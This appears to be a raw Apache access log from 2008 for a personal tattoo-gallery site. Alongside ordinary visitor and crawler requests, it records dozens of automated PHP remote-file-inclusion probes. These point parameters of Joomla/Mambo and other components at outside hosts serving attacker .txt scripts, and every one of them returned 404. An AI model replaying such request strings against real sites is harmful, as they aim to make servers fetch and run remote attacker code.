204.246.125.62 - - [21/Jun/2008:23:48:01 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:01 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:02 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:02 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:02 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:16 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:16 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:16 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:16 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:16 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:16 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:16 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:16 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:16 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:16 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:16 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:30 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:31 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:31 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:31 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
85.17.93.163 - - [21/Jun/2008:23:49:05 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.17.93.163 - - [21/Jun/2008:23:49:08 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.17.93.163 - - [21/Jun/2008:23:49:09 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.17.93.163 - - [21/Jun/2008:23:49:13 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.6.17.158 - - [21/Jun/2008:23:52:46 -0500] "GET /logs/access_log.1192147200 HTTP/1.0" 200 227748 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.208.46.46 - - [21/Jun/2008:23:53:43 -0500] "GET /logs//agendax/errors.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
74.208.46.46 - - [21/Jun/2008:23:53:44 -0500] "GET //agendax/errors.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
74.208.46.46 - - [21/Jun/2008:23:53:46 -0500] "GET /logs//agendax/errors.inc.php?agendax_path=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
74.208.46.46 - - [21/Jun/2008:23:53:46 -0500] "GET //agendax/errors.inc.php?agendax_path=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
74.208.46.46 - - [21/Jun/2008:23:53:57 -0500] "GET /logs//agendax/errors.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
74.208.46.46 - - [21/Jun/2008:23:53:58 -0500] "GET //agendax/errors.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
204.246.125.62 - - [21/Jun/2008:23:59:48 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:48 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:48 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:49 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:52 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:55 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:55 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:55 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:55 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:55 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:55 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:55 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:55 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:55 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:55 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:59:56 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [22/Jun/2008:00:00:07 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [22/Jun/2008:00:00:07 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [22/Jun/2008:00:00:07 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [22/Jun/2008:00:00:07 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [22/Jun/2008:00:00:07 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [22/Jun/2008:00:00:07 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [22/Jun/2008:00:00:07 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [22/Jun/2008:00:00:07 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [22/Jun/2008:00:00:07 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [22/Jun/2008:00:00:07 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [22/Jun/2008:00:00:08 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
74.208.46.46 - - [22/Jun/2008:00:19:33 -0500] "GET /logs//agendax/info.inc.php?agendax_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
74.208.46.46 - - [22/Jun/2008:00:19:33 -0500] "GET //agendax/info.inc.php?agendax_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
74.6.17.158 - - [22/Jun/2008:00:33:04 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.91 - - [22/Jun/2008:00:34:24 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.98.220 - - [22/Jun/2008:00:34:25 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.178.146 - - [22/Jun/2008:00:34:49 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
74.53.178.146 - - [22/Jun/2008:00:34:49 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
211.20.85.150 - - [22/Jun/2008:00:36:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
87.106.101.24 - - [22/Jun/2008:00:37:59 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
87.106.101.24 - - [22/Jun/2008:00:37:59 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
87.106.101.24 - - [22/Jun/2008:00:38:02 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
87.106.101.24 - - [22/Jun/2008:00:38:02 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
66.249.67.136 - - [22/Jun/2008:00:38:36 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.9.228.149 - - [22/Jun/2008:00:39:35 -0500] "GET /logs//secpay.inc.php?config%5Broot_dir%5D=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.812"
72.9.228.149 - - [22/Jun/2008:00:39:35 -0500] "GET //secpay.inc.php?config%5Broot_dir%5D=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
87.106.98.71 - - [22/Jun/2008:00:39:53 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.106.98.71 - - [22/Jun/2008:00:39:54 -0500] "GET /phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.149.241.207 - - [22/Jun/2008:00:39:54 -0500] "GET /logs//secpay.inc.php?config%5Broot_dir%5D=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
89.149.241.207 - - [22/Jun/2008:00:39:54 -0500] "GET //secpay.inc.php?config%5Broot_dir%5D=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
217.110.54.240 - - [22/Jun/2008:00:41:48 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.803"
217.110.54.240 - - [22/Jun/2008:00:41:49 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.803"
195.161.113.132 - - [22/Jun/2008:00:42:39 -0500] "GET /logs//component/option,com_facileforms/Itemid,238//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 383 "-""libwww-perl/5.808"
195.161.113.132 - - [22/Jun/2008:00:42:39 -0500] "GET //component/option,com_facileforms/Itemid,238//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.808"
87.106.101.24 - - [22/Jun/2008:00:46:08 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
87.106.101.24 - - [22/Jun/2008:00:46:09 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.106.101.24 - - [22/Jun/2008:00:46:11 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.106.101.24 - - [22/Jun/2008:00:46:12 -0500] "GET /phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.106.101.24 - - [22/Jun/2008:00:46:19 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.106.101.24 - - [22/Jun/2008:00:46:19 -0500] "GET /phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
80.67.24.2 - - [22/Jun/2008:00:47:48 -0500] "GET /logs/phphtml.php?htmlclass_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
80.67.24.2 - - [22/Jun/2008:00:47:49 -0500] "GET /phphtml.php?htmlclass_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
210.48.67.39 - - [22/Jun/2008:00:47:57 -0500] "GET /logs/phphtml.php?htmlclass_path=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
210.48.67.39 - - [22/Jun/2008:00:47:57 -0500] "GET /phphtml.php?htmlclass_path=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
80.67.24.2 - - [22/Jun/2008:00:48:20 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
80.67.24.2 - - [22/Jun/2008:00:48:20 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
89.149.241.207 - - [22/Jun/2008:00:49:22 -0500] "GET /logs//secpay.inc.php?config%5Broot_dir%5D=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
89.149.241.207 - - [22/Jun/2008:00:49:23 -0500] "GET //secpay.inc.php?config%5Broot_dir%5D=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
74.208.46.46 - - [22/Jun/2008:00:50:35 -0500] "GET //dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.803"
74.208.46.46 - - [22/Jun/2008:00:50:36 -0500] "GET /logs//dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
202.174.80.131 - - [22/Jun/2008:00:51:34 -0500] "GET /logs//secpay.inc.php?config%5Broot_dir%5D=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
202.174.80.131 - - [22/Jun/2008:00:51:34 -0500] "GET //secpay.inc.php?config%5Broot_dir%5D=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.208.46.46 - - [22/Jun/2008:00:51:58 -0500] "GET //dfd_cart/product.control.config.php?set_depth=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
74.208.46.46 - - [22/Jun/2008:00:52:01 -0500] "GET /logs//dfd_cart/product.control.config.php?set_depth=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
80.67.24.2 - - [22/Jun/2008:00:52:30 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
80.67.24.2 - - [22/Jun/2008:00:52:30 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
80.67.24.2 - - [22/Jun/2008:00:52:30 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.808"
80.67.24.2 - - [22/Jun/2008:00:52:31 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.808"
213.186.62.37 - - [22/Jun/2008:00:53:21 -0500] "GET /logs//secpay.inc.php?config%5Broot_dir%5D=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
213.186.62.37 - - [22/Jun/2008:00:53:21 -0500] "GET //secpay.inc.php?config%5Broot_dir%5D=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
74.53.240.146 - - [22/Jun/2008:00:55:19 -0500] "GET /logs/phphtml.php?htmlclass_path=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
74.53.240.146 - - [22/Jun/2008:00:55:19 -0500] "GET /phphtml.php?htmlclass_path=http://fsm.upsi.edu.my//db/albid.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
89.108.68.56 - - [22/Jun/2008:00:56:02 -0500] "GET /logs/modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.108.68.56 - - [22/Jun/2008:00:56:05 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
67.19.74.194 - - [22/Jun/2008:00:56:16 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.elmosfire.com/lustpillen/osc/images/readme.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
67.19.74.194 - - [22/Jun/2008:00:56:16 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.elmosfire.com/lustpillen/osc/images/readme.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
74.6.23.224 - - [22/Jun/2008:00:57:21 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.46 - - [22/Jun/2008:00:57:21 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
190.34.160.226 - - [22/Jun/2008:00:59:45 -0500] "GET /logs/index2.php?x=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
190.34.160.226 - - [22/Jun/2008:00:59:46 -0500] "GET /index2.php?x=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.67.25.167 - - [22/Jun/2008:01:00:17 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 369 "-""libwww-perl/5.808"
